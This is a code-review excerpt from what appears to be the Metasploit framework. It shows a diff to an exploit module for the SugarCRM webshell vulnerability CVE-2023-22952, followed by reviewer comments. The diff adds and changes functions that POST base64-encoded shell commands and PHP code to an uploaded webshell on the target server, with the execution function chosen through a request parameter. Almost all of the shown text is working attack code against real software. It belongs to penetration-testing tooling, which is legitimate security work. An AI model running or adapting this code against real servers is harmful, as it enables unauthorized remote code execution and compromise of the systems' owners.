modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -169,15 +217,32 @@ def upload_webshell
     end
   end
 
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        '1' => payload
+      }
+    })
+  end
+
   def execute_command(cmd, _opts = {})
     payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
     return send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'cache', 'images', @webshell_name),
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
       'cookie' => @phpsessid.to_s,
       'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        '0' => php_cmd_function
+      },
       'vars_post' => {
-        'c' => payload
+        '1' => payload
```

Comment:
Having the ability to randomize this would be great 👍

Reply:
This will be fixed when the `mixin` for generating these PNGs is ready.

Reply:
See https://github.com/rapid7/metasploit-framework/pull/17507/commits/44ed254dde24d65518e63d2a5c791f605ff666e1

Reply:
Not sure that is the commit that fixed it but looking at the changed files I can see that this was resolved and nicely so. Good job!